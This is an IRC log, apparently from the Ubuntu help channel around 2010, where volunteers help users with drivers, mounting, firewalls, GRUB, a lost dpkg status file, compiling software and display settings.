lefantomedloperawildbat: I don't succeed http://pastebin.com/TdUyH7d809:46
nUboon2Ageanirvana: that's first, but it is SO much harder w/o ethernet.  I wouldn't recommend trying it.09:47
sprivatjoin #ubuntu-ru09:48
anirvanaAh, Ok then I'll try to get a wired connection first.09:48
leagrispazsion, 8.04 is not supported any more. BTW, unless you have good reason on installing drivers from nvidia, you'd better stick with the pre-packaged ones: select nvidia-glx from synaptic and it will put every dependant required packages.09:48
wildbatlefantomedlopera, if you need more then one option you need , like : -o allow_other,uid=1000,gid=1000,bababab09:48
radikalsnow what u want to install09:48
wildbatlefantomedlopera, consult:  man mount09:49
rethusradikal: can u tell me what i should do to enable this request on the firewall?09:49
rethusUnknown InputIN=ppp0 OUT= MAC= SRC= DST= LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3565 DF PROTO=TCP SPT=1093 DPT=7438 WINDOW=65535 RES=0x00 SYN URGP=009:49
lefantomedloperawildbat: Hox to I know the number who correspond to lefantomedlopera09:50
nUboon2Ageanirvana: in the meantime you can find out the install procedure for your chipset.09:50
wildbatlefantomedlopera, you can use name  too ~09:50
lefantomedloperaand the number linked with the word "root"09:50
lefantomedloperaand if i put no option it work but owner is "root"09:51
radikalrethus  i no sure but maybe whit disable the firewall09:51
SNowradikal sendmail09:51
rethusjes, but i can't always disable it.09:51
lefantomedloperaso why if i put -o I have to precise for every other options09:51
rethusi will that it work together09:51
ouyesit is very hard for ubuntu to recognize the modem on my Blackberry09:51
wildbatlefantomedlopera, mount  /dev/sda2 /media/disk -o uid=lefantomedlopera,gid=root09:51
radikalno whit the frist time u disable this  u need it enable again09:52
wildbatrethus, use firestarter it is easiler09:52
rethusi have firestarter09:53
josh-NI am using the FF plugin Shockwave Flash 10.0 r45... but it seems to cause problems with embedded videos (video and sound lag) ... any suggestions what to do?09:53
lefantomedloperaokay I forgoten the koma09:53
radikaljosh-N try instal en synaptic restrictec extras09:54
lefantomedloperaand believed option should be just after mount09:54
wildbatSNow, try : sudo apt-get check09:54
SNow  python-uno: Depends: openoffice.org-core (= 1:2.4.1-1ubuntu2.3) but 1:2.4.1-1ubuntu2.4 is installed09:54
josh-Nradikal: do i get that right? the package name is "restricted-extras"?09:54
anirvananUboon2Age : Do I need to do that?Can't I just type an apt.... command on terminal to install wifi driver?09:54
wildbatrethus, setting rules in firestarter is easy ~ right on log can be one of the fasteset way09:56
wildbatrightclick *09:56
seb_hey can someone help me out with wifi09:56
seblabelNICK jojo09:56
radikaljosh-N  try this page and find a transletor cuz is  in spanish  ok http://new.taringa.net/posts/linux/5596462/Muchas-aplicaciones-Ubuntu-Karmic-y_o-Lucid.html09:56
nUboon2Ageanirvana: usually unfortunately no.  I have to run now, so others can fill you in.09:56
seb_i've spent like 2-3 hours on tutorials for this i can't get it working09:57
wildbatjosh-N, install video driver may be ~09:57
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rethusi know, but in the log, my connection didn't appear09:57
wildbatrethus, create one then09:57
SNowwildbat: ?09:58
ChintaHi, I need to urgently sign a scholarship application online, and I am having issues with Java. I need the latest Java version installed, but I seem too much of a noob in Ubuntu to do it. Can anyone assist me, please-please? :-(09:58
wildbatSNow, huh?09:58
rethus.i also have accept all incomming traffic for
rethusbut still doesn't work09:58
seb_i think my machine thinks the wireless connection is a bluetooth connection09:58
SNowwildbat: http://p.defau.lt/?8bDI0om8CjtKeQgo7RIUvg09:59
bodzillachinta install the ubuntu restricted extras from a terminal or synaptic this will load java09:59
josh-Nradikal, wildbat: thanks, gonna try one after the other09:59
Chintabodzilla: but is it the latest java the one in the repositories?09:59
thune3seb_: what hardware, what drivers loaded?09:59
wildbatrethus, hmmm may be you want ?09:59
radikalyes and sorry  but im try to read on inglish09:59
leagrispazsion, are you doing well with nvidia-glx?10:00
ChintaWhen I type version -java in terminal it says it is 1.6.0, Im asked to have 6_20 installed (are version numbers the same for Win and Linux, by the way?)10:00
bodzillachinta I'm not sure but it should work: is the site is telling you the latest?10:00
airdemcan you give me the latest ubuntu repositories? i cant find a list10:00
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bodzillaairdeem what are you looking for?10:01
wildbatSNow, hmm try purge them and reinstall them10:01
airdembodzilla, i want to add the ubuntu repository to crunchbang10:01
bodzillaairdem why?10:02
rashad7_how to install trident tv box usb tv tuner card on ubuntu 10.0110:02
SNowwildbat: fixed: root@ns204601:/usr/bin# ln -s python2.5 python10:02
airdemi want to install this tool10:02
Machtin29106 be/4 martin    596.72 K/s    0.00 B/s  ?unavailable?  dolphin -icon system-file-manager -caption Dolphin <- i checked iotop and i have several dolphin processes like that10:02
Machtinwhat does it do?10:02
airdemor should i just add the ppa repo?10:03
rashad7_anyone installed trident tv box on ubuntu10:03
wildbatSNow, lol that's funny10:03
bodzillaairdem waht tool10:03
airdem<airdem> http://www.ubuntugeek.com/mount-manager-user-friendly-management-of-disks-and-partitions.html10:03
hartis there a equalizer for alsa?10:04
seb_thune3: my card is a Broadcom 802.11g Wireless10:04
rethusfirestarter is a gui for iptables...  and here my rules: http://rethus.pastebin.com/U1vS5HLq10:04
seb_thune3: 10:00.0 Ethernet controller [0200]: Broadcom Corporation NetLink BCM5787M Gigabit Ethernet PCI Express [14e4:1693] (rev 0210:04
rashad7_seb_ broadcom will automatically loaded on ubuntu10:05
seb_rashad7: well it dosn't seem like the case10:06
bodzillaairdem mountmanager is in Ubuntu use the command given on the page it may need the repositories opened from software sources10:07
rashad7_anyone please say ubuntu 10.04 lts official repo10:09
rashad7_i cannot find svn in the existing rep!!10:09
=== emc_ is now known as emc
bodzillarashad ubuntu.com10:10
silv3r_m00nhi there10:10
moetunes!find svn10:10
ubottuFound: libecore-con-svn-05, libecore-config-svn-05, libecore-evas-svn-05, libecore-fb-svn-05, libecore-file-svn-05 (and 64 others)10:10
silv3r_m00nafter upgrading linxu kernel from synaptic I see double entries in grub10:10
silv3r_m00nfor different versions of kernel10:10
silv3r_m00ninfact triple10:10
bodzillasilv3r_moon thats normal always have 210:11
n2diysilv3r_m00n: normal, incase the new kernel didn't work, you can use one of the old ones.10:11
silv3r_m00nthat's good10:11
silv3r_m00nI have total of 6 entries , 1 for kernel and 1 for safe mode of each10:11
bodzillasilv3_moon sudo apt-get autoremove can be used to remove extras but be careful10:12
seb_hey can anyone help me out with my wireless connection10:13
rashad7_bodzilla only ubuntu.com10:13
thune3seb_: see my pm10:13
bodzillaseb_whats wrong10:13
Xgatessay I'm using ufw on another distro, but since it's a Ubuntu firewall I wanted to ask if someone can please look at this on pastebin and see if the start line looks ok for doing an echo to show it's starting in the console at bootup:  http://pastebin.com/G24mcqNQ10:13
bodzillarashad7 do you want a torrent or what10:15
rashad7_bodzilla ubuntu  repository link such as .... main contrib non-freee10:15
rashad7_like that10:15
moetunesXgates: seems fine10:16
Xgatesmoetunes: what are the 'returns' for? I see them after all the echo lines in the file, so I wasn't sure if I needed it or not10:17
moetunesXgates: they return the completion code - 0=fine , 1=error etc10:18
bodzillarashad7 i'm ot understanding nonfree sounds like flash10:18
bodzillarashad7 what exactly are you looking for10:19
Xgatesmoetunes: but then am I suppose to have return 0 after it then, like this:   http://pastebin.com/64AThb5N10:20
rashad7_bodzilla i am lokking for ubuntu 10.04 repositories10:20
rashad7_like deb http://...10:21
NarbeHhow can i read mails for my user?10:21
moetunesXgates: I have returns at the end of ifs but it shouldn't matter10:21
bodzillarashad7 do you have Lucid installed10:21
n2diyNarbeH: go to a terminal, and type mail10:21
rashad7_bodzilla yes10:22
NarbeHn2diy: and how can i delete them?10:22
rashad7_i cannot find all packages in the default repo10:22
n2diyNarbeH: study how the program works, it's there.10:22
bodzillarashad7 software sources in admin is where they are10:22
NarbeHn2diy: just tell me how to Delete, i need it now10:23
n2diyNarbeH: I haven't used mail in five years, I don't remember, study it, you can figure it out.10:23
n2diyNarbeH: when you find the delete command, you can tell it to delete 1-10, or 1-100, whatever.10:24
WXZdoes anyone know a tutorial of how to compile a source project, maybe a video on youtube10:24
radikalsombody know some program for use in  security cam ?10:24
WXZsource package*10:24
WXZeverything I've read so far was too difficult for me to understand10:25
bodzillarashad7 sudo gedit /etc/apt/sources.list will open the apt repo list make sur all are on and save then try for packages10:25
n2diyWXZ: each project should have a README file, that explains it. Maybe not as easy as you like, but it works for that project.10:26
WXZI'll check10:26
no-namei am trying to make a script that opens two or more text files at once in gedit. i write $ gedit /home/*/file1 /home/*/file2. when i try to run the script in terminal by typing ./script it says bad flag alias and bad flag vector over and over again before opening them10:26
rohitabhowill any one help me out? i have some problem with my ubuntu 10.04!10:26
bodzillaoh no a Zombie10:26
WXZyup, you're right10:26
no-namei say text file but they are not txt files, just files without extensions10:27
WXZnope, no instructions there n2diy10:27
bodzillarohitabo whats the proble10:27
rohitabhoif i change the resolution of monitor to 1024x768 then the mouse pointer disappear.10:27
rohitabhobut after applying again it appears again10:28
WXZtrying to compile tomboy 1.2 if that helps10:28
WXZbut a general understanding of how to compile tarballs would be a lot more useful10:28
rohitabhobut every time i login the same problem occurs.10:28
n2diyWXZ: that's a surprise, I haven't compiled anything in a while, but there should be some kind of instructions?10:29
rohitabhobut why? i can't recognize?10:29
bodzillarohitabho have you looked in appearance-custom-cursor10:29
WXZnope, just a link to the tomboy website, a description and an email address10:29
rashd7_bodzilla i didnt get you10:29
IncarnationIs there a way to install Ubuntu and then install WinXP on another partition on the same machine, and then still receive the GRUB loading screen during power-up?10:29
rohitabhoyes but nothing happend.10:29
WXZand where to report bugs10:29
rashd7_i my ubuntu repositories i have no svn package10:30
rohitabhoinstead of cursor the mous works fine.10:30
n2diyWXZ: the README will be in the tomboy download.10:30
WXZit is, but it doesn't contain instructions10:30
bodzillarashad7 not knowing what your trying to add makes this very hard can I get a hint10:30
WXZmay I send you the readme?10:30
cousteauIncarnation: you'll lose the GRUB. You can back up the MBR and restore it later, or use a Live CD to restore it (you can use Super Grub Disc for this)10:31
bodzillarohitabho I'm not sure why your having this proble try the Ubuntu forums maybe10:31
WXZit's in a file called INSTALL10:31
IncarnationHow can I back up the MBR and restore it?10:32
no-namewhat is a flag vector, and what is a flag alias?10:32
bodzillaIncarnation which Ubuntu are you running10:32
WXZoh wow, the install package tells me to read README even though there's nothing there, weird10:33
IncarnationGood question... 9 I believe10:33
n2diyWXZ:should be, if it is a true source package.10:33
bodzillaIncarnation which grub leagacy or grub210:33
Xgatesis there a way I can have ufw log to it's own file like? ---> /var/log/ufw?10:33
IncarnationHow can I determine which grub I am using?10:33
WXZdownloaded from here http://projects.gnome.org/tomboy/download.html10:33
Incarnation(I'm betting Grub2)10:33
Josh_hey all10:36
bodzillaIncarnation I cant find the command toi make sure10:36
scriptwarlockdo anyone knows how to share a file in the net? i have files to share but i dont want my real ip to be seen10:36
bodzillaIncarnation grub2 should have a grub.cfg10:36
IncarnationYes, I just came across that file10:36
Incarnationit was in my grub folder, so it probably is Grub210:37
n2diyWXZ: yes, I was just there, are you sure you can't just get it with apt-get, or synaptic?10:37
Incarnationhttp://en.wikipedia.org/wiki/File:GRUB_screenshot.png << it looks like this10:37
* scriptwarlock test10:37
WXZwon't be the latest version10:37
WXZnot only that, I'm planning to modify the source later on10:37
bodzillaIncarnation grub2 wiki https://help.ubuntu.com/community/Grub2#Upgrading10:38
IncarnationUbuntu 9.10 installs Grub2 by default so it's Grub2 for sure10:38
n2diyWXZ: well, that's the price you pay for ease of install.10:38
WXZthe second part's kind of important10:38
bodzillaIncarnation that looks like grub legacy you have to know before doing anything look in synaptic is it gru-pc10:39
IncarnationLol I'm sorry, I am not versed in linux that well10:40
Incarnationwhat is synaptic?10:40
Xgatesis there a way I can have ufw log to it's own file like? ---> /var/log/ufw?10:40
SirMoo:/ Is Ubuntu anti-twitter or something?10:40
WXZIncarnation: synaptic is the package manager, (let's you install and uninstall stuff)10:40
airtonixIncarnation, a menu option you'll find in your system menu10:40
bodzillaIncarnation go to Ubuntu forums and post you will get the best help there for such a big project10:40
ShapeShifter499SirMoo: lolwut?10:40
n2diyWXZ: well then, roll up your sleeves, and go for it, at least it is a gnome project, so it should be reasonably easy.10:40
* SirMoo shrugs.10:40
SirMooNo twitter feed...10:41
IncarnationOkay, I just found the package manager10:41
WXZthat's what I'm doing here n2diy10:41
ShapeShifter499SirMoo: just install a twitter client10:41
SirMooNo no..10:41
SirMooI mean... the company itself...10:41
n2diyWXZ: good luck.10:41
ShapeShifter499SirMoo: oohhh10:41
IncarnationOkay, I will try the forums10:41
bodzillaIncarnation thats the best option to get the full low down10:42
IncarnationExcellent =]10:42
IncarnationThank you10:42
bodzillaIncarnation I spend alot of time there with boot problems see you there10:42
IncarnationOkay bodzilla, what's your username?10:43
ShapeShifter499SirMoo: best thing I could find lmao---> http://twitter.com/uupc10:43
bodzillaIncarnation PM if needed10:43
ShapeShifter499SirMoo: no wait http://twitter.com/planetubuntu10:44
SirMooUbuntugeek is a good one.10:44
BibbWhat VNC server do you recommend for xfce4/xubuntu?10:45
Josh_Does anyone know how to make terminator start already split and running irssi10:46
Xgatessay is Lucid using  ufw 0.30pre1-0ubuntu210:46
youevilmonkeyCan someone guide me in installing world of warcraft on ubuntu 8.04?10:46
XgatesI installed ufw on another distro and I wanted to know if  0.29-4ubuntu1 is more stable then ufw 0.30pre1-0ubuntu2?10:47
ShapeShifter499eh.....anyways I'm still working on this old Dell Inspiron 2500 to make it an server but.....there are snags...   there are a few things and buttons that don't seem to work once my ubuntu/xubuntu system has loaded(at login screen), one the built-in trackpad and mouse buttons, two the power button doesn't do anything....how do I get these things working?10:47
z0r0Is there some compiled list of cards that support 802.11n?10:48
z0r0erm for linux10:48
Josh_Does anyone know how to make terminator start already split and running irssi10:48
sibahello, I'm using ubuntu 10.04 (64bit) on a acer aspire 2930 (Intel Graphics Media Accelerator X4500M HD). When I connect an Asus vw222s monitor it looks like the refresh is wrong. It auto-set the refresh at 60hz (and I can't change it using the monitor setting gnome software) but the image is not correct. What can I use to correct the setting? Is there any driver I have to use? Thank you very much10:50
WXZquick question, what does "./" mean in the ubuntu terminal?10:50
sibaWXZ: it is used to launch a software10:51
z0r0WXZ: current dir10:51
sibaz0r0: isn't it used like ./software.sh10:51
sibato launcha  script10:51
kingletHey guys, I have a big problem when I want to install apps or open synaptic pkg mng and ... error msg is: E: Could not open file /var/lib/dpkg/status - open (2: No such file or directory)10:51
WXZalright, that's what I thought10:51
zen0Josh__: check terminator's man page10:52
z0r0WXY: No prob : )10:52
zen0it can do it pretty easily i think10:52
cousteaukinglet: do you have any other program that uses dpkg opened, such as another instance of synaptic, the upgrades...?10:52
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zen0but im not a terminator user (hence why im not going to write it for you :))10:53
kingletcousteau: no problem is not for opening other package manager! status directory missed!10:53
Dblue715Hey everyone..10:53
kingletcousteau: I tried to mv status-old but cannot do it!10:53
Dblue715I am trying to install ubuntu from the dvd and have some problems.. can someone help me out ??10:54
red2kicDblue715: I'm sorry to hear about your "problems" -- Be more descriptive than that. Please. :)10:54
Dblue715I am able to boot from the Live DVD.. it starts out but saying there's some error and it will load the graphical interface..10:55
Dblue715then the same time details, and thing.. then it saying it cannot write to a particular partision10:56
Dblue715I am on raid0 and I feel that has something to do with this..10:56
bluenodehi, why 10.04 display a message durin installation that it "has encountered unrecoverable error"?10:57
Dblue715no reason given..10:57
kingletcousteau: any idea?!10:57
cousteaubluenode: maybe your ISO image is corrupted and the CD isn't ok10:57
bluenode2 different dvds10:58
bluenodeand 64 and 32 bit verison BOTH10:58
Dblue715I have 2 different copies of the media from entirely different sources..10:58
cousteaukinglet: no idea, sorry... when did it happen?10:58
red2kicDblue715: Did you check !raid ?10:58
bluenodethe same comp, drive  run the 8.04 without any problems10:58
red2kic!raid | Dblue71510:58
ubottuDblue715: Tips and tricks for RAID and LVM can be found on https://help.ubuntu.com/community/Installation/SoftwareRAID and http://www.tldp.org/HOWTO/LVM-HOWTO - For software RAID, see https://help.ubuntu.com/community/FakeRaidHowto10:58
cousteaubluenode: did you checked them with md5?10:58
kingletcousteau: 30minutes ago!10:59
red2kicDblue715: I don't use raid myself nor do I know enough about it to use it. There might be some guides on how to set it up.10:59
bluenodeI have no idea... this is official release ...10:59
sibado you know if there is any other IRC channel I can ask for video card related problems on ubuntu?10:59
bluenodeyes! md5 is correct10:59
cousteaukinglet: after installing something or doing something?10:59
bluenodeI do not know what to do.10:59
erUSULsiba: ask here10:59
red2kicsiba: #nvidia or #ati -- I think10:59
red2kicsiba: There also are #hardware -- but you can ask here first (as erUSUL suggest).10:59
sibaerUSUL:  I'm using ubuntu 10.04 (64bit) on a acer aspire 2930 (Intel Graphics Media Accelerator X4500M HD). When I connect an Asus vw222s monitor it looks like the refresh is wrong. It auto-set the refresh at 60hz (and I can't change it using the monitor setting gnome software) but the image is not correct. What can I use to correct the setting? Is there any driver I have to use? Thank you very much10:59
kingletcousteau: I dont know :(10:59
cousteaubluenode: also checked the md5 of the dvd?11:00
cousteaukinglet: I would try rebooting before anything else11:00
bluenodei will do it.11:00
kingletcousteau: how can I do?11:01
red2kicsiba: Try xrandr (and maybe creating a custom Xorg with correct Vertical + Horizionatal ranges11:01
erUSULsiba: intel hardware should work with the drivers provided by the system.11:01
Dblue715I have tried this instal a few times and everytime it reports and error and when I restart, it goes to the grub command prompt and I cannot even boot windows becase I don't know how..11:01
cousteaukinglet: shut down applet > Reboot > OK11:01
bluenodeah! maybe this is a problem11:01
bluenodei used CD700MD insted of DVDs11:02
red2kic!fixres | siba11:02
ubottusiba: The X Window System is the part of your system that's responsible for graphical output. To restart your X, type « sudo /etc/init.d/?dm restart » in a console - To fix screen resolution or other X problems: https://wiki.ubuntu.com/X/Config/Resolution11:02
bluenodecd 700 mb11:02
sibathank you everybody, I will try :)11:02
kingletcousteau: haha! I know that, I reboot it before come here :P11:02
cousteaubluenode: how did you manage to fit a 1.something GB image on a 700 MB CD?11:02
kingletHey guys, I have a big problem when I want to install apps or open synaptic pkg mng and ... error msg is: E: Could not open file /var/lib/dpkg/status - open (2: No such file or directory)11:02
bluenodewith k3b11:02
cousteaukinglet: oh, ok...11:02
bluenodeit did not protested11:02
kingletcousteau: I resend my problem, Hope someone can help me. anyway tnx alot man :)11:03
bluenodeno errors during writing...11:03
cousteaukinglet: have you checked that the PC is plugged? XD ...no, really,   ls -l /var/lib/dpkg/11:03
Dblue715As per the page you have adviced, it saying I need to download the alternate install cd.. so trying that now..11:04
phawxSo im looking at this website <http://gizmodo.com/5561977/100000-lego-bricks-make-for-one-hell-of-a-robotic-chess-set> and there's a video,  but when i click on play,  it doesnt play.  I dont have issues viewing videos on youtube.com....anyone got any suggestions11:04
kingletcousteau: I have not any status dir11:04
erUSULphawx: is a known problem... flash controls not responding to clicks11:04
cousteaukinglet: don't know much about dpkg, but I think that's waaay weird11:05
kingletcousteau: alternatives , info , parts , triggers and updates are the directories in here11:05
Josh___anyone know how to make terminator start already split and running irssi11:05
cousteaukinglet: dunno in lucid, but at least in jaunty /var/lib/dpkg/status is a file, not a folder11:05
erUSULkinglet: but do you see the file status or status-old ?11:06
HypothesisFroghi. I'm having real problems resolving dependencies for mysql stuff in hardy. It's for a vps server.11:06
kingleterUSUL: no mate! I tried to mv status-old but isnt here11:06
kingletcousteau: yup may be its a file, anyway no file and no directory what named status11:06
erUSULkinglet: :/ take a look in /lost+found/11:07
Dblue715anyone installed Ubuntu 10.04 on raid, please help me out..11:07
kingleterUSUL: where is the /lost+found/?11:08
Dblue715i'm on a raid 0 as of now..11:08
erUSULkinglet: in the root directory ... /lost+found/ is the complete path11:08
ubottuTips and tricks for RAID and LVM can be found on https://help.ubuntu.com/community/Installation/SoftwareRAID and http://www.tldp.org/HOWTO/LVM-HOWTO - For software RAID, see https://help.ubuntu.com/community/FakeRaidHowto11:08
cousteauphawx: which ad or flash blockers do you have?11:08
erUSULphawx: https://bugs.launchpad.net/ubuntu/+source/flashplugin-nonfree/+bug/41040711:08
erUSULphawx: see the workarounds proposed...11:09
kingleterUSUL: aha, here is not anything11:09
erUSULkinglet: is empty ?11:09
kingleterUSUL: yup!11:09
erUSULkinglet: :( then where have the status files gone ?? did you removed them ?11:10
cousteauphawx: the youtube embedded video works for me, I have flash 10.1 rc 711:10
kingleterUSUL: yes maybe its removed! how can I recover it?11:10
erUSULkinglet: the problem is you can not (i do not know how anyway) :( and it is a pretty important file of the system. central to how dpkg works11:11
cousteaukinglet: what were you doing before it disappeared? did you install something or did something weird?11:11
wildbatis there a command to turnoff the screen?11:11
erUSULkinglet: that's why there are two copies. ( status and status-old )11:11
LOVE_SPi need help about ubuntu 10.04 plz11:11
cousteauwildbat: is   xscreensaver-command -lock   enough?11:12
kingletcousteau: I think, I removed the status file :(11:12
LOVE_SPcan anyone help me here ?11:12
bluenodemy ISO is 699 MB11:12
kingleterUSUL: :( so I have to reinstall ubuntu?11:12
bluenodeso it should fit on CD11:12
erUSULkinglet: found some solution11:12
erUSULkinglet: http://www.debianhelp.co.uk/debianproblem.htm11:12
red2kic!help | LOVE_SP11:12
ubottuLOVE_SP: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)11:12
brickyhey anybody have compiz animations that dont work? mainly for opening / closing11:12
cousteauwildbat: sorry,   gnome-screensaver-command --lock11:12
bluenodethere were similar issues11:13
LOVE_SPok sorry i'm new irc user11:13
kingleterUSUL: tnx, goin to see it11:13
brickyI can't get the vacuum effect, or anything lol11:13
bluenodethe installer has encountered an unrecoverable error. A desktop session will now be run etc11:13
erUSULkinglet: do not looks trivial but it is your only option11:13
bluenodenobod have seen this message before?11:13
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wildbatcousteau,  i mean i want the monitor in standby mode11:14
cousteaubluenode: it was the live CD or the DVD?11:14
bluenodeit was CD11:14
brickybluenode: im sure somebody here has lol not me tho11:14
erUSULkinglet: wait ....11:14
Dblue715bluenode : i am having the same problem.11:14
kingleterUSUL: shh... The connection has timed out11:14
erUSULkinglet: found a simpler solution ....11:14
LOVE_SPi just upgraded from karmic to 10.04 , i cant edit my /etc/fstab , its read only , i did $ sudo gedit /etc/fstab11:14
brickyanybody remember somebody by the name of Skaythe`11:14
cousteaubluenode: ok, then using CDs instead of DVDs might not be the problem11:14
kingleterUSUL: wow, cool :P11:14
kingleterUSUL: tnx11:15
brickyback in maybe 03-0411:15
erUSULkinglet: try this « sudo cp /var/backups/dpkg.status.0 /var/lib/dpkg/status »11:15
Josh___anyone know how to make terminator start already split and running irssi11:15
LOVE_SPi just upgraded from karmic to 10.04 , i cant edit my /etc/fstab , its read only , i did $ sudo gedit /etc/fstab11:15
cousteauLOVE_SP: type   ls -l /etc/fstab11:16
erUSULkinglet: worked ?11:16
kingleterUSUL: oh! I think it fixed! wait test it11:16
red2kicLOVE_SP: What does "ls -l /etc/fstab" say? It should be -rw-r--r-- 1 root root11:16
om26erbluenode, not a bug in wubi11:17
bluenodeI am searchinthe forums for possible hint11:17
LOVE_SP-rw-r--r-- 1 root root 555 2010-03-09 19:37 /etc/fstab11:17
om26erbluenode, I am not sure about wubi but if there is a way to start a live session during wubi install this problem wont happen11:17
kingleterUSUL: OMG! yea worked. I'm realy realy thankfull11:17
bluenodeI have done simple clean installation11:18
erUSULkinglet: you are wellcome; be more carefull next time when you use "sudo rm" :)11:18
WXZI'm trying to compile something and it says "error: can't find gmcs in your PATH"11:18
cousteauLOVE_SP: sudo should work, but just to be sure, try with    gksudo gedit /etc/fstab11:18
kingleterUSUL: haha! yea11:18
bluenodeI have a win 7 RTM and ubuntu 8.04 on the same machine11:18
om26erbluenode, then you should first start the live session and start installation from there11:18
cousteauWXZ: run gmcs and see what package it requires11:18
WXZhow would I run gmcs11:18
cousteauoh, mono-devel, I think11:18
LOVE_SPi just did , theres [read-only] on the title of gedit11:19
LOVE_SPsave button is deactivated11:19
bluenodeso this will be safe, and system will work without erros, and is there any way to chck ihe integrioty of CD before installing like in 8.04?11:19
WXZI don't even have that installed.. that could be a problem11:19
cousteauWXZ: open a terminal, write "gmcs" and hit enter. It won't work, but at least it will tell you what package you need11:19
cousteauwhich is "mono-devel"11:19
Dblue715the live cd works fine.. tried the install from there but does not work.. error writing to partition nvidia_eeeccdb511:19
WXZI didn't have mono-devel installed11:20
Pirate_HunterI am now running lucid installed flash and pulseaudio however I don't get any sound coming out of my speakers not even with alsa-utils installed. Pavucontrol shows that firefox is being captured and sound is actually coming out but I cant hear it, anyone know why?11:20
WXZsynapticing it right now11:20
wildbatis there a command to turnoff the screen,ie put it in standby mode?11:20
cousteauWXZ: anyway, if you type a command and you don't have the program installed but that program is in repositories, it tells you what package you need11:20
WXZdiff. error now cousteau11:20
WXZso that's progress11:21
cousteauWXZ: you probably need some libraries too11:21
WXZyeah, it passed a step called "checking for gmcs"11:21
WXZso I'm good11:21
erUSULwildbat: maybe « gnome-screensaver-command -l »11:22
Dblue715downloading the alternate install cd now.. anyone tried that ??11:22
wildbaterUSUL, that just blank the screeen :<11:23
cousteauwildbat: mayb e you can achieve something with xrandr11:23
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ShapeShifter499Dblue715: just used it to install one of my systems11:23
cousteaudeactivating the screen11:23
red2kicwildbat: What is wrong with blanking the screen? :O11:23
cousteaubut then I have no idea how to make it work again11:23
wildbatred2kic, i want it off11:23
Dblue715ShapeShifter499 : raid0 or something else ?11:23
bluenodei found possible solution11:24
cousteauwildbat: you can make the screensaver stop sending a signal after X minutes of inactivity11:24
bluenodeso the keyboard icon is for pressing keys11:24
ShapeShifter499Dblue715: uh.....11:24
cousteauand then the monitor will typically auto power off11:24
bluenodeit should be written!11:24
bluenodenot in pictograms11:25
Dblue715ShapeShifter : is that a yes ?11:25
cousteaubluenode: it must be in an internationally understandable language11:25
ShapeShifter499Dblue715: *is semi-ubunoob*11:25
cousteaubut it should be easier to understand11:25
Josh__anyone know how to make terminator start already split and running irssi11:25
bluenodeyes, but the pictograms should be more explicit11:25
ShapeShifter499Dblue715: I just ran it from my cd drive idk xD11:25
cousteauJosh__:   man terminator11:25
bluenodeI work with graphics11:25
sibaI tried what you suggested me about xrandr and checking the X FAQ page but it still continue to looks refreshing wrong11:26
bluenodethe pictogram should invoke reaction, the keyboard "=" sing not mean something man equal to keyboard? :)11:26
bluenodehand on buttons - this is understandable11:27
wildbatFound it ^^ in my old notes ^^ xset dpms force off11:27
cousteaubluenode: yes, a finger pressing the keys would be easier to uderstand11:27
DeMolay!netbook remix11:28
red2kic!unr | DeMolay11:28
ubottuDeMolay: Ubuntu Netbook Remix is a slightly altered version of Ubuntu, optimised for small screens. For more information, please see https://wiki.ubuntu.com/UNR - support in #ubuntu11:28
DeMolayred2kic: tx!!11:29
bluenodeis there any "icons contest" for ubuntu?11:29
bluenodei would like to participate:P11:29
bluenodeok reboot now - i want to try this 10.04.11:29
erUSULbluenode: there are no contest but you are wellcome to participate i'm sure11:29
bluenodei will contact in the future11:30
om26erwhats up with the keyring server these days its been a few days since it worked11:30
DNDguys is apache 2.2.15 available on hardy via apt?11:30
erUSUL!info apache2 hardy11:31
ubottuapache2 (source: apache2): Next generation, scalable, extendable web server. In component main, is optional. Version 2.2.8-1ubuntu0.16 (hardy), package size 44 kB, installed size 104 kB11:31
erUSULDND: nope is  2.2.811:31
erUSUL!info apache211:31
ubottuapache2 (source: apache2): Apache HTTP Server metapackage. In component main, is optional. Version 2.2.14-5ubuntu8 (lucid), package size 1 kB, installed size 36 kB11:31
DNDactually i managed to install 2.2.911:32
erUSULDND: no even lucid has 2.2.15 ....11:32
DeMolayis there any channel dedicated to Netbook Remix? I have an issue with the upper bar and don't want to ask here if it is not right to do it11:32
h00ked2hi all, how can i give sudo persmissions to some users? thx11:32
erUSULDND: do you rally need that version ? keep in mind that supported releases of ubuntu get security patches...11:32
DNDerUSUL, hmm so no coice but to compile it huh?11:32
erUSULh00ked2: make them part of the admin group... if you ant more fine grained control you will have to edit sudoers11:33
DNDwell we are complying for shopping cart services11:33
ubottuIf new updated Ubuntu packages are built for an application, then they may go into Ubuntu Backports. See https://help.ubuntu.com/community/UbuntuBackports - See also !packaging11:33
DNDand based on the assessment we need 2.2.1511:33
WXZno package "gdk-2.0" found << same message x2 except with "gtk+-2.0" and "atk"11:33
ubottuA Personal Package Archive (PPA) can provide alternate software not normally available in the offical Ubuntu repositories - Looking for a PPA? See https://launchpad.net/ubuntu/+ppas - WARNING: PPAs are unsupported third-party packages, and should be used at your own risk.11:33
WXZnot in synaptic package manager11:33
cousteauWXZ: you probably want something called "libXXXX-dev" if you are asked for something called XXXX when compiling a program11:34
WXZI see11:34
cousteauWXZ: look for it on packages.ubuntu.com11:36
WXZI found atk and gdk in synaptic11:36
WXZI'll try that site for gtk11:36
h00ked2erUSUL: ok, thanks, but, i look, as if i install eggdrop under root, i cant start him, via user with, sudo, but i cant run him under, root, so im going to do new install11:36
darthow to solve gpgp key error?11:37
ubottuGetting GPG errors after adding custom repositories? Find the GPG keyword for the repository (it's 437D05B5 for the standard ones) and run « gpg --keyserver keyserver.ubuntu.com --recv-keys <key> && gpg --export --armor <key> | sudo apt-key add - »11:37
WXZall seems to be working11:38
DeMolaysomeone with lucid netbook remix and a disappearing upper bar o any information about this issue?11:40
zigford /close11:45
phox_hi! So i tried to update to the latest version yesterday in the update manager from the previous version, and now the thing wont start correctly. Just says there's nothing to boot on from /dev or something. I have played around a bit in bios and the settings are correct. During the installation of 10.04 the comp is supposed to reboot, but as i said it didnt quite work. What can i do?11:48
Xgateshey all11:48
Xgatessay I have gufw installed on another distro, I wanted a simple firewall using ufw and I have gtk2 themes on my box only running OpenBox and I have a .gtkrc-2.0 but gufw doesn't load any gtk2 themes, anyone know why? Here's my file: http://pastebin.com/2fWs3SRS11:50
erUSULphox_: i would try the provedure to restore grub.11:50
erUSUL!grub2 | phox_11:50
ubottuphox_: GRUB2 is the default Ubuntu boot manager since Karmic. For more information and troubleshooting on GRUB2 please refer to https://wiki.ubuntu.com/Grub211:50
